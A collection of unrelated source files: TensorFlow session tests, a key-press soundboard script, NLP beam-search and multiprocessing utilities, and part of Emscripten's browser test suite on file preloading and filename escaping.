self.assertEqual(c_list[0], out[0].decode('utf-8'))
self.assertEqual(c_list[1], out[1].decode('utf-8'))
out = c.eval(feed_dict={feed_t: np.array(c_list, dtype=np.object)})
self.assertEqual(c_list[0], out[0].decode('utf-8'))
self.assertEqual(c_list[1], out[1].decode('utf-8'))
def testInvalidTargetFails(self):
with self.assertRaisesRegexp(
RuntimeError,
'No session factory registered for the given session options.'):
session.Session('INVALID_TARGET')
def testFetchByNameDifferentStringTypes(self):
with session.Session() as sess:
c = constant_op.constant(42.0, name='c')
d = constant_op.constant(43.0, name=u'd')
e = constant_op.constant(44.0, name=b'e')
f = constant_op.constant(45.0, name=r'f')
self.assertTrue(isinstance(c.name, six.text_type))
self.assertTrue(isinstance(d.name, six.text_type))
self.assertTrue(isinstance(e.name, six.text_type))
self.assertTrue(isinstance(f.name, six.text_type))
self.assertEqual(42.0, sess.run('c:0'))
self.assertEqual(42.0, sess.run(u'c:0'))
self.assertEqual(42.0, sess.run(b'c:0'))
self.assertEqual(42.0, sess.run(r'c:0'))
self.assertEqual(43.0, sess.run('d:0'))
self.assertEqual(43.0, sess.run(u'd:0'))
self.assertEqual(43.0, sess.run(b'd:0'))
self.assertEqual(43.0, sess.run(r'd:0'))
self.assertEqual(44.0, sess.run('e:0'))
self.assertEqual(44.0, sess.run(u'e:0'))
self.assertEqual(44.0, sess.run(b'e:0'))
self.assertEqual(44.0, sess.run(r'e:0'))
self.assertEqual(45.0, sess.run('f:0'))
self.assertEqual(45.0, sess.run(u'f:0'))
self.assertEqual(45.0, sess.run(b'f:0'))
self.assertEqual(45.0, sess.run(r'f:0'))
def testIncorrectGraph(self):
with ops.Graph().as_default() as g_1:
c_1 = constant_op.constant(1.0, name='c')
with ops.Graph().as_default() as g_2:
c_2 = constant_op.constant(2.0, name='c')
self.assertEqual('c', c_1.op.name)
self.assertEqual('c', c_2.op.name)
with session.Session(graph=g_1) as sess_1:
self.assertEqual(1.0, sess_1.run(c_1))
with self.assertRaises(ValueError):
sess_1.run(c_2)
with self.assertRaises(ValueError):
sess_1.run(c_2.op)
with session.Session(graph=g_2) as sess_2:
with self.assertRaises(ValueError):
sess_2.run(c_1)
with self.assertRaises(ValueError):
sess_2.run(c_1.op)
self.assertEqual(2.0, sess_2.run(c_2))
def testPartialRun(self):
with session.Session() as sess:
a = array_ops.placeholder(dtypes.float32, shape=[])
b = array_ops.placeholder(dtypes.float32, shape=[])
c = array_ops.placeholder(dtypes.float32, shape=[])
r1 = math_ops.add(a, b)
r2 = math_ops.mul(r1, c)
h = sess.partial_run_setup([r1, r2], [a, b, c])
res = sess.partial_run(h, r1, feed_dict={a: 1, b: 2})
self.assertEqual(3, res)
temp = res * 17
res = sess.partial_run(h, r2, feed_dict={c: temp})
self.assertEqual(153, res)
# Call again on the same graph.
h2 = sess.partial_run_setup([r1, r2], [a, b, c])
res = sess.partial_run(h2, r1, feed_dict={a: 1, b: 2})
self.assertEqual(3, res)
temp = res * 18
res = sess.partial_run(h2, r2, feed_dict={c: temp})
self.assertEqual(162, res)
def testPartialRunIncomplete(self):
with session.Session() as sess:
a = array_ops.placeholder(dtypes.float32, shape=[])
b = array_ops.placeholder(dtypes.float32, shape=[])
c = array_ops.placeholder(dtypes.float32, shape=[])
r1 = math_ops.add(a, b)
r2 = math_ops.mul(r1, c)
h = sess.partial_run_setup([r1, r2], [a, b, c])
res = sess.partial_run(h, r1, feed_dict={a: 1, b: 2})
self.assertEqual(3, res)
def testConcurrentPartialRun(self):
with session.Session() as sess:
a = array_ops.placeholder(dtypes.float32, shape=[])
b = array_ops.placeholder(dtypes.float32, shape=[])
c = array_ops.placeholder(dtypes.float32, shape=[])
r1 = math_ops.add(a, b)
r2 = math_ops.mul(r1, c)
h1 = sess.partial_run_setup([r1], [a, b, c])
h2 = sess.partial_run_setup([r1, r2], [a, b, c])
res = sess.partial_run(h1, r1, feed_dict={a: 1, b: 2})
self.assertEqual(3, res)
temp = res * 19
res = sess.partial_run(h2, r1, feed_dict={a: temp, b: 9})
self.assertEqual(66, res)
res = sess.partial_run(h2, r2, feed_dict={c: 7})
self.assertEqual(462, res)
def testManyPartialRun(self):
with session.Session() as sess:
steps = 200
inputs = []
outputs = []
a = constant_op.constant(2.0, dtypes.float32)
for i in xrange(steps):
inputs.append(array_ops.placeholder(dtypes.float32, shape=[]))
a = math_ops.mul(a, inputs[i])
outputs.append(a)
h = sess.partial_run_setup(outputs, inputs)
for i in xrange(steps):
res = sess.partial_run(h, outputs[i], feed_dict={inputs[i]: 1.0})
self.assertEqual(2.0, res)
feed_dict = {}
for i in xrange(steps):
feed_dict[inputs[i]] = 1.0
res = sess.run(outputs, feed_dict)
self.assertEqual(steps, len(res))
self.assertEqual(2.0, res[-1])
def testFeedDictKeyException(self):
with session.Session() as sess:
a = constant_op.constant(1.0, dtypes.float32, name='a')
with self.assertRaisesRegexp(TypeError, "Cannot interpret feed_dict"):
sess.run(a, feed_dict={'a': [2.0]})
if __name__ == '__main__':
googletest.main()
|
soundboard.py
|
import threading
from pynput import keyboard
from playsound import playsound
BATZ = './batz.m4a'
BLJAD = './bljad.m4a'
SHESH = './shesh.m4a'
OH_SHIT = './oh_shit.m4a'
def play_sound(sound_name):
playsound(sound_name)
def on_press(key):
try:
if key == keyboard.Key.space:
threading.Thread(target=play_sound, args=(BLJAD,)).start()
elif key == keyboard.Key.backspace:
threading.Thread(target=play_sound, args=(OH_SHIT,)).start()
elif key == keyboard.Key.shift_l or key == keyboard.Key.shift_r:
threading.Thread(target=play_sound, args=(SHESH,)).start()
else:
threading.Thread(target=play_sound, args=(BATZ,)).start()
except AttributeError:
threading.Thread(target=play_sound, args=(BLJAD,)).start()
def on_release(key):
if key == keyboard.Key.esc:
# Stop listener
return False
# Collect events until released
with keyboard.Listener(
on_press=on_press,
on_release=on_release
) as listener:
listener.join()
|
utils.py
|
import numpy as np
import keras
import keras.backend as K
import heapq
import copy
from multiprocessing import Pool, Process, SimpleQueue, Pipe
import dgl
import networkx as nx
inf = 1e10
class Multiprocessing:
@staticmethod
def work(fun, child_conn, args):
ret = fun(args[0], child_conn, args[2])
child_conn.send(("close", ret))
@staticmethod
def mapping(fun, args_list, processes, partial_to_loss):
ans = [None] * len(args_list)
pipes = []
for batch_start in range(0, len(args_list), processes):
ps = []
for i in range(batch_start, min(batch_start + processes, len(args_list))):
parent_conn, child_conn = Pipe()
pipes.append(parent_conn)
p = Process(target=Multiprocessing.work, args=(fun, child_conn, args_list[i]))
p.start()
ps.append(p)
unfinished = len(ps)
while unfinished > 0:
for i in range(batch_start, min(batch_start + processes, len(args_list))):
if pipes[i] is not None:
s = pipes[i].recv()
if len(s) == 2 and s[0] == "close":
ans[i] = s[1]
pipes[i] = None
unfinished -= 1
else:
pipes[i].send(partial_to_loss(s, args_list[i][1]))
for p in ps:
p.join()
return ans
class MultiprocessingWithoutPipe:
@staticmethod
def work(fun, num, q, args):
np.random.seed(num)
ret = fun(*args)
q.put((num, ret))
@staticmethod
def mapping(fun, args_list, processes):
ans = [None] * len(args_list)
q = SimpleQueue()
for batch_start in range(0, len(args_list), processes):
ps = []
for i in range(batch_start, min(batch_start + processes, len(args_list))):
p = Process(target=MultiprocessingWithoutPipe.work, args=(fun, i, q, args_list[i]))
p.start()
ps.append(p)
while not q.empty():
num, ret = q.get()
ans[num] = ret
for p in ps:
p.join()
while not q.empty():
num, ret = q.get()
ans[num] = ret
return ans
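# Hedged usage sketch (illustrative only; the worker function must be a
# top-level def so it stays picklable under spawn-based start methods).
def _square(x):
    return x * x

def _multiprocessing_example():
    args_list = [(i,) for i in range(4)]
    # runs at most 2 worker processes at a time; returns [0, 1, 4, 9]
    return MultiprocessingWithoutPipe.mapping(_square, args_list, processes=2)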
class Gradient(keras.layers.Layer):
def __init__(self, y, **kwargs):
super(Gradient, self).__init__(**kwargs)
self.y = y
def build(self, input_shape):
# Create a trainable weight variable for this layer.
super(Gradient, self).build(input_shape) # Be sure to call this at the end
def call(self, x, **kwargs):
return K.gradients(self.y, x)[0]
def compute_output_shape(self, input_shape):
return input_shape
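# Hedged sketch (assumes a TF1-style graph-mode Keras backend, as the
# K.gradients call above requires).
def _gradient_example():
    x = keras.layers.Input(shape=(3,))
    y = K.sum(x * x)
    return Gradient(y)(x)  # symbolic dy/dx, i.e. 2 * x element-wise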
def tuple_set_union(ret0: tuple, ret1: tuple):
if ret0 is None:
return ret1
if ret1 is None:
return ret0
ret = ()
max_len = max(len(ret0), len(ret1))
for i in range(max_len):
if i >= len(ret0):
r0 = [""]
else:
r0 = ret0[i]
if i >= len(ret1):
r1 = [""]
else:
r1 = ret1[i]
ret += (tuple(set(r0).union(set(r1))),)
return ret
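# Hedged sketch: positions are unioned as sets, with "" padding the shorter tuple.
def _tuple_set_union_example():
    merged = tuple_set_union((("a",), ("b",)), (("a", "c"),))
    assert set(merged[0]) == {"a", "c"}
    assert set(merged[1]) == {"b", ""}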
class Beam:
def __init__(self, budget):
        '''
        Each queue entry is a (score, data) pair; the score is the ranking key (descending).
        :param budget: the beam search budget
        '''
self.budget = budget
self.queue = []
self.in_queue = {}
def add(self, data, score):
'''
add (data, score) into queue
:param data: candidate
:param score: score of the candidate
:return: True if added in, False otherwise
'''
        if data in self.in_queue:  # if data is already in the priority queue, we update the score in self.in_queue
if self.in_queue[data] < score:
self.in_queue[data] = score
return True
return False
ret = True
if len(self.queue) == self.budget: # if size(queue) == budget, we need to remove one
while True:
a, b = heapq.heappop(self.queue)
                # the popped entry may be stale: its score may have been updated in self.in_queue
if a == self.in_queue[b]: # if the value is not updated, then it is smallest
break # remove (a, b)
else:
heapq.heappush(self.queue,
(self.in_queue[b], b)) # otherwise, update in the priority queue (lazily)
del self.in_queue[b] # remove (a, b) from self.in_queue
            if a > score:  # if the old (a, b) is better than the new (score, data), we replace (score, data) with (a, b)
score, data = a, b
ret = False
heapq.heappush(self.queue, (score, data)) # add (score, data)
self.in_queue[data] = score # update in self.in_queue
return ret
def extend(self, others):
if isinstance(others, list):
for data, score in others:
self.add(data, score)
else:
assert False
# for data, score in others.queue:
# self.add(data, score)
def check_balance(self):
ret = []
for data in self.in_queue:
ret.append((data, self.in_queue[data]))
ret.sort(key=lambda x: -x[1])
return ret
def is_same(self, others: list):
if len(others) != len(self.queue):
return False
others.sort(key=lambda x: -x[1])
for i in range(len(others)):
data, score = others[i]
if data not in self.in_queue or self.in_queue[data] != score:
return False
return True
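# Hedged usage sketch: keep only the top-2 scored candidates.
def _beam_example():
    beam = Beam(budget=2)
    beam.add("a", 0.1)
    beam.add("b", 0.5)
    beam.add("c", 0.3)           # evicts "a", the lowest-scored entry
    return beam.check_balance()  # [("b", 0.5), ("c", 0.3)]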
class UnorderedBeam:
def __init__(self, budget):
self.budget = budget
self.queue = []
def add(self, data):
self.queue.append(data)
def extend(self, others):
if isinstance(others, list):
self.queue.extend(others)
else:
assert False
# for data, score in others.queue:
# self.add(data, score)
def check_balance(self):
ids = np.random.randint(0, len(self.queue), self.budget)
ret = []
for id in ids:
ret.append(self.queue[id])
return ret
class Dict:
def __init__(self, char2id):
self.char2id = char2id
self.id2char = [" "] * len(char2id)
for c in char2id:
self.id2char[char2id[c]] = c
def to_string(self, ids):
return "".join([self.id2char[x] for x in ids])
def to_ids(self, s):
return np.array([self.char2id[c] for c in s])
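# Hedged sketch: round-trip between a string and its id sequence.
def _dict_example():
    d = Dict({"a": 0, "b": 1})
    assert d.to_string([0, 1, 0]) == "aba"
    assert list(d.to_ids("ab")) == [0, 1]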
def swap_pytorch(x, p1, p2):
z = x[p1].clone()
x[p1] = x[p2]
x[p2] = z
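# Hedged sketch of an in-place row swap (torch is not imported at module
# level in this file, so the import is local to the example).
def _swap_example():
    import torch
    t = torch.tensor([[1, 2], [3, 4]])
    swap_pytorch(t, 0, 1)
    assert t.tolist() == [[3, 4], [1, 2]]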
def compute_adjacent_keys(dict_map):
lines = open("./dataset/en.key").readlines()
adjacent_keys = [[] for i in range(len(dict_map))]
for line in lines:
tmp = line.strip().split()
ret = set(tmp[1:]).intersection(dict_map.keys())
ids = []
for x in ret:
ids.append(dict_map[x])
adjacent_keys[dict_map[tmp[0]]].extend(ids)
return adjacent_keys
def cons_tree(x, phi, f, old_tree, vocab):
PAD_WORD = -1
g = nx.DiGraph()
old_xid = old_tree.ndata['x'].tolist()
cnt = 0
map_old_xid_x_id = [None] * len(old_xid)
for i, id in enumerate(old_xid):
if id != PAD_WORD: # PAD_WORD
map_old_xid_x_id[i] = cnt
cnt += 1
assert cnt == len(x) # sanity check
def _rec_build(old_u):
in_nodes = old_tree.in_edges(old_u)[0]
sub_trees = []
for node in in_nodes:
node = int(node)
if old_tree.in_degrees(node) == 0:
# leaf node
cid = g.number_of_nodes()
id = map_old_xid_x_id[node]
if phi[id] == 0:
word = vocab.get(x[id], PAD_WORD)
elif phi[id] == 1:
continue
elif phi[id] == 2:
left = cid + 1
right = cid + 2
word = vocab.get(x[id], PAD_WORD)
g.add_node(cid, x=PAD_WORD, y=int(old_tree.ndata['y'][node]),
mask=0) # we duplicate the y label
g.add_node(left, x=word, y=int(old_tree.ndata['y'][node]), mask=1)
g.add_node(right, x=word, y=int(old_tree.ndata['y'][node]), mask=1)
g.add_edge(left, cid)
g.add_edge(right, cid)
sub_trees.append(cid)
continue
elif phi[id] == 3:
word = vocab.get(f[id], PAD_WORD)
else:
raise NotImplementedError
g.add_node(cid, x=word, y=int(old_tree.ndata['y'][node]), mask=1)
sub_trees.append(cid)
else:
sub_tree = _rec_build(node)
if sub_tree is not None:
sub_trees.append(sub_tree)
if len(sub_trees) == 0:
return None
elif len(sub_trees) == 1:
return sub_trees[0]
else:
assert len(sub_trees) == 2 # sanity check
nid = g.number_of_nodes()
g.add_node(nid, x=PAD_WORD, y=int(old_tree.ndata['y'][old_u]), mask=0)
for cid in sub_trees:
g.add_edge(cid, nid)
return nid
# add root
root = _rec_build(0)
g.add_node(root, x=PAD_WORD, y=int(old_tree.ndata['y'][0]), mask=0)
assert old_tree.out_degrees(0) == 0 # sanity check
return dgl.from_networkx(g, node_attrs=['x', 'y', 'mask'])
|
test_browser.py
|
import BaseHTTPServer, multiprocessing, os, shutil, subprocess, unittest, zlib, webbrowser, time, shlex
from runner import BrowserCore, path_from_root
from tools.shared import *
# User can specify an environment variable EMSCRIPTEN_BROWSER to force the browser test suite to
# run using another browser command line than the default system browser.
emscripten_browser = os.environ.get('EMSCRIPTEN_BROWSER')
if emscripten_browser:
cmd = shlex.split(emscripten_browser)
def run_in_other_browser(url):
Popen(cmd + [url])
if EM_BUILD_VERBOSE_LEVEL >= 3:
print >> sys.stderr, "using Emscripten browser: " + str(cmd)
webbrowser.open_new = run_in_other_browser
def test_chunked_synchronous_xhr_server(support_byte_ranges, chunkSize, data, checksum):
class ChunkedServerHandler(BaseHTTPServer.BaseHTTPRequestHandler):
def sendheaders(s, extra=[], length=len(data)):
s.send_response(200)
s.send_header("Content-Length", str(length))
s.send_header("Access-Control-Allow-Origin", "http://localhost:8888")
s.send_header("Access-Control-Expose-Headers", "Content-Length, Accept-Ranges")
s.send_header("Content-type", "application/octet-stream")
if support_byte_ranges:
s.send_header("Accept-Ranges", "bytes")
for i in extra:
s.send_header(i[0], i[1])
s.end_headers()
def do_HEAD(s):
s.sendheaders()
def do_OPTIONS(s):
s.sendheaders([("Access-Control-Allow-Headers", "Range")], 0)
def do_GET(s):
if not support_byte_ranges:
s.sendheaders()
s.wfile.write(data)
else:
(start, end) = s.headers.get("range").split("=")[1].split("-")
start = int(start)
end = int(end)
end = min(len(data)-1, end)
length = end-start+1
s.sendheaders([],length)
s.wfile.write(data[start:end+1])
s.wfile.close()
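# presumably one range request per chunk: the 10-chunks-plus-one-byte payload
# used by test_chunked_synchronous_xhr below arrives as 11 requests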
expectedConns = 11
httpd = BaseHTTPServer.HTTPServer(('localhost', 11111), ChunkedServerHandler)
for i in range(expectedConns+1):
httpd.handle_request()
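# Hedged sketch (not part of the original tests) of exercising the server
# above with a byte-range request once it is listening:
#
#   import httplib
#   conn = httplib.HTTPConnection('localhost', 11111)
#   conn.request('GET', '/', headers={'Range': 'bytes=0-1023'})
#   first_chunk = conn.getresponse().read()  # bytes 0..1023 of the payload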
class browser(BrowserCore):
@classmethod
def setUpClass(cls):
super(browser, cls).setUpClass()
cls.browser_timeout = 20
print
print 'Running the browser tests. Make sure the browser allows popups from localhost.'
print
def test_sdl1(self):
self.btest('hello_world_sdl.cpp', reference='htmltest.png')
self.btest('hello_world_sdl.cpp', reference='htmltest.png', args=['-s', 'USE_SDL=1']) # is the default anyhow
def test_html_source_map(self):
cpp_file = os.path.join(self.get_dir(), 'src.cpp')
html_file = os.path.join(self.get_dir(), 'src.html')
# browsers will try to 'guess' the corresponding original line if a
# generated line is unmapped, so if we want to make sure that our
# numbering is correct, we need to provide a couple of 'possible wrong
# answers'. thus, we add some printf calls so that the cpp file gets
# multiple mapped lines. in other words, if the program consists of a
# single 'throw' statement, browsers may just map any thrown exception to
# that line, because it will be the only mapped line.
with open(cpp_file, 'w') as f:
f.write(r'''
#include <cstdio>
int main() {
printf("Starting test\n");
try {
        throw 42; // line 6
} catch (int e) { }
printf("done\n");
return 0;
}
''')
# use relative paths when calling emcc, because file:// URIs can only load
# sourceContent when the maps are relative paths
try_delete(html_file)
try_delete(html_file + '.map')
Popen([PYTHON, EMCC, 'src.cpp', '-o', 'src.html', '-g4'],
cwd=self.get_dir()).communicate()
assert os.path.exists(html_file)
assert os.path.exists(html_file + '.map')
webbrowser.open_new('file://' + html_file)
time.sleep(1)
print '''
If manually bisecting:
Check that you see src.cpp among the page sources.
Even better, add a breakpoint, e.g. on the printf, then reload, then step through and see the print (best to run with EM_SAVE_DIR=1 for the reload).
'''
def test_emscripten_log(self):
src = os.path.join(self.get_dir(), 'src.cpp')
open(src, 'w').write(self.with_report_result(open(path_from_root('tests', 'emscripten_log', 'emscripten_log.cpp')).read()))
Popen([PYTHON, EMCC, src, '--pre-js', path_from_root('src', 'emscripten-source-map.min.js'), '-g', '-o', 'page.html', '-s', 'DEMANGLE_SUPPORT=1']).communicate()
self.run_browser('page.html', None, '/report_result?1')
def build_native_lzma(self):
lzma_native = path_from_root('third_party', 'lzma.js', 'lzma-native')
if os.path.isfile(lzma_native) and os.access(lzma_native, os.X_OK): return
cwd = os.getcwd()
try:
os.chdir(path_from_root('third_party', 'lzma.js'))
if WINDOWS and Building.which('mingw32-make'): # On Windows prefer using MinGW make if it exists, otherwise fall back to hoping we have cygwin make.
Popen(['doit.bat']).communicate()
else:
Popen(['sh', './doit.sh']).communicate()
finally:
os.chdir(cwd)
def test_preload_file(self):
absolute_src_path = os.path.join(self.get_dir(), 'somefile.txt').replace('\\', '/')
open(absolute_src_path, 'w').write('''load me right before running the code please''')
absolute_src_path2 = os.path.join(self.get_dir(), '.somefile.txt').replace('\\', '/')
open(absolute_src_path2, 'w').write('''load me right before running the code please''')
def make_main(path):
print 'make main at', path
path = path.replace('\\', '\\\\').replace('"', '\\"') # Escape tricky path name for use inside a C string.
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = !strcmp("load me right before", buf);
REPORT_RESULT();
return 0;
}
''' % path))
test_cases = [
# (source preload-file string, file on target FS to load)
("somefile.txt", "somefile.txt"),
(".somefile.txt@somefile.txt", "somefile.txt"),
("./somefile.txt", "somefile.txt"),
("somefile.txt@file.txt", "file.txt"),
("./somefile.txt@file.txt", "file.txt"),
("./somefile.txt@./file.txt", "file.txt"),
("somefile.txt@/file.txt", "file.txt"),
("somefile.txt@/", "somefile.txt"),
(absolute_src_path + "@file.txt", "file.txt"),
(absolute_src_path + "@/file.txt", "file.txt"),
(absolute_src_path + "@/", "somefile.txt"),
("somefile.txt@/directory/file.txt", "/directory/file.txt"),
("somefile.txt@/directory/file.txt", "directory/file.txt"),
(absolute_src_path + "@/directory/file.txt", "directory/file.txt")]
for test in test_cases:
(srcpath, dstpath) = test
print 'Testing', srcpath, dstpath
make_main(dstpath)
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--preload-file', srcpath, '-o', 'page.html']).communicate()
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Test that '--no-heap-copy' works.
if WINDOWS:
# On Windows, the following non-alphanumeric non-control code ASCII characters are supported.
# The characters <, >, ", |, ?, * are not allowed, because the Windows filesystem doesn't support those.
tricky_filename = '!#$%&\'()+,-. ;=@[]^_`{}~.txt'
else:
# All 7-bit non-alphanumeric non-control code ASCII characters except /, : and \ are allowed.
tricky_filename = '!#$%&\'()+,-. ;=@[]^_`{}~ "*<>?|.txt'
open(os.path.join(self.get_dir(), tricky_filename), 'w').write('''load me right before running the code please''')
make_main(tricky_filename)
# As an Emscripten-specific feature, the character '@' must be escaped as '@@' so it is not confused with the 'src@dst' notation.
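# For instance, a file literally named 'a@b.txt' would be passed as
# --preload-file 'a@@b.txt' (an illustrative name, not used by this test).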
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--preload-file', tricky_filename.replace('@', '@@'), '--no-heap-copy', '-o', 'page.html']).communicate()
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# By absolute path
make_main('somefile.txt') # absolute becomes relative
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--preload-file', absolute_src_path, '-o', 'page.html']).communicate()
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Test subdirectory handling with asset packaging.
try_delete(self.in_dir('assets'))
os.makedirs(os.path.join(self.get_dir(), 'assets/sub/asset1/').replace('\\', '/'))
os.makedirs(os.path.join(self.get_dir(), 'assets/sub/asset1/.git').replace('\\', '/')) # Test adding directory that shouldn't exist.
os.makedirs(os.path.join(self.get_dir(), 'assets/sub/asset2/').replace('\\', '/'))
open(os.path.join(self.get_dir(), 'assets/sub/asset1/file1.txt'), 'w').write('''load me right before running the code please''')
open(os.path.join(self.get_dir(), 'assets/sub/asset1/.git/shouldnt_be_embedded.txt'), 'w').write('''this file should not get embedded''')
open(os.path.join(self.get_dir(), 'assets/sub/asset2/file2.txt'), 'w').write('''load me right before running the code please''')
absolute_assets_src_path = os.path.join(self.get_dir(), 'assets').replace('\\', '/')
def make_main_two_files(path1, path2, nonexistingpath):
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = !strcmp("load me right before", buf);
f = fopen("%s", "r");
if (f == NULL)
result = 0;
fclose(f);
f = fopen("%s", "r");
if (f != NULL)
result = 0;
REPORT_RESULT();
return 0;
}
''' % (path1, path2, nonexistingpath)))
test_cases = [
# (source directory to embed, file1 on target FS to load, file2 on target FS to load, name of a file that *shouldn't* exist on VFS)
("assets", "assets/sub/asset1/file1.txt", "assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets/", "assets/sub/asset1/file1.txt", "assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets/@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets@./", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
(absolute_assets_src_path + "@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
(absolute_assets_src_path + "@/assets", "/assets/sub/asset1/file1.txt", "/assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt")]
for test in test_cases:
(srcpath, dstpath1, dstpath2, nonexistingpath) = test
make_main_two_files(dstpath1, dstpath2, nonexistingpath)
print srcpath
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--preload-file', srcpath, '--exclude-file', '*/.*', '-o', 'page.html']).communicate()
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Should still work with -o subdir/..
make_main('somefile.txt') # absolute becomes relative
try:
os.mkdir(os.path.join(self.get_dir(), 'dirrey'))
except OSError:
pass # the directory may already exist
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--preload-file', absolute_src_path, '-o', 'dirrey/page.html']).communicate()
self.run_browser('dirrey/page.html', 'You should see |load me right before|.', '/report_result?1')
# With FS.preloadFile
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
Module.preRun = function() {
FS.createPreloadedFile('/', 'someotherfile.txt', 'somefile.txt', true, false); // we need --use-preload-plugins for this.
};
''')
make_main('someotherfile.txt')
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--pre-js', 'pre.js', '-o', 'page.html', '--use-preload-plugins']).communicate()
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Tests that output files whose names contain single or double quotes are handled by correctly escaping the names.
def test_output_file_escaping(self):
tricky_part = '\'' if WINDOWS else '\' and \"' # On Windows, files/directories may not contain a double quote character. On non-Windowses they can, so test that.
d = 'dir with ' + tricky_part
abs_d = os.path.join(self.get_dir(), d)
try:
os.mkdir(abs_d)
except OSError:
pass # the directory may already exist
txt = 'file with ' + tricky_part + '.txt'
abs_txt = os.path.join(abs_d, txt)
open(abs_txt, 'w').write('load me right before')
cpp = os.path.join(d, 'file with ' + tricky_part + '.cpp')
open(cpp, 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = !strcmp("|load me right before|", buf);
REPORT_RESULT();
return 0;
}
''' % (txt.replace('\'', '\\\'').replace('\"', '\\"'))))
data_file = os.path.join(abs_d, 'file with ' + tricky_part + '.data')
data_js_file = os.path.join(abs_d, 'file with ' + tricky_part + '.js')
Popen([PYTHON, FILE_PACKAGER, data_file, '--use-preload-cache', '--indexedDB-name=testdb', '--preload', abs_txt + '@' + txt, '--js-output=' + data_js_file]).communicate()
page_file = os.path.join(d, 'file with ' + tricky_part + '.html')
abs_page_file = os.path.join(self.get_dir(), page_file)
Popen([PYTHON, EMCC, cpp, '--pre-js', data_js_file, '-o', abs_page_file]).communicate()
self.run_browser(page_file, '|load me right before|.', '/report_result?0')
def test_preload_caching(self):
open(os.path.join(self.get_dir(), 'somefile.txt'), 'w').write('''load me right before running the code please''')
def make_main(path):
print path
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
extern "C" {
extern int checkPreloadResults();
}
int main(int argc, char** argv) {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = 0;
result += !strcmp("load me right before", buf);
result += checkPreloadResults();
REPORT_RESULT();
return 0;
}
''' % path))
open(os.path.join(self.get_dir(), 'test.js'), 'w').write('''
mergeInto(LibraryManager.library, {
checkPreloadResults: function() {
var cached = 0;
var packages = Object.keys(Module['preloadResults']);
packages.forEach(function(package) {
var fromCache = Module['preloadResults'][package]['fromCache'];
if (fromCache)
++ cached;
});
return cached;
}
});
''')
make_main('somefile.txt')
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--use-preload-cache', '--js-library', os.path.join(self.get_dir(), 'test.js'), '--preload-file', 'somefile.txt', '-o', 'page.html']).communicate()
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?2')
def test_preload_caching_indexeddb_name(self):
open(os.path.join(self.get_dir(), 'somefile.txt'), 'w').write('''load me right before running the code please''')
def make_main(path):
print path
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
extern "C" {
extern int checkPreloadResults();
}
int main(int argc, char** argv) {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = 0;
result += !strcmp("load me right before", buf);
result += checkPreloadResults();
REPORT_RESULT();
return 0;
}
''' % path))
open(os.path.join(self.get_dir(), 'test.js'), 'w').write('''
mergeInto(LibraryManager.library, {
checkPreloadResults: function() {
var cached = 0;
var packages = Object.keys(Module['preloadResults']);
packages.forEach(function(package) {
var fromCache = Module['preloadResults'][package]['fromCache'];
if (fromCache)
++ cached;
});
return cached;
}
});
''')
make_main('somefile.txt')
Popen([PYTHON, FILE_PACKAGER, os.path.join(self.get_dir(), 'somefile.data'), '--use-preload-cache', '--indexedDB-name=testdb', '--preload', os.path.join(self.get_dir(), 'somefile.txt'), '--js-output=' + os.path.join(self.get_dir(), 'somefile.js')]).communicate()
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--js-library', os.path.join(self.get_dir(), 'test.js'), '--pre-js', 'somefile.js', '-o', 'page.html']).communicate()
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?2')
def test_multifile(self):
# a few files inside a directory
self.clear()
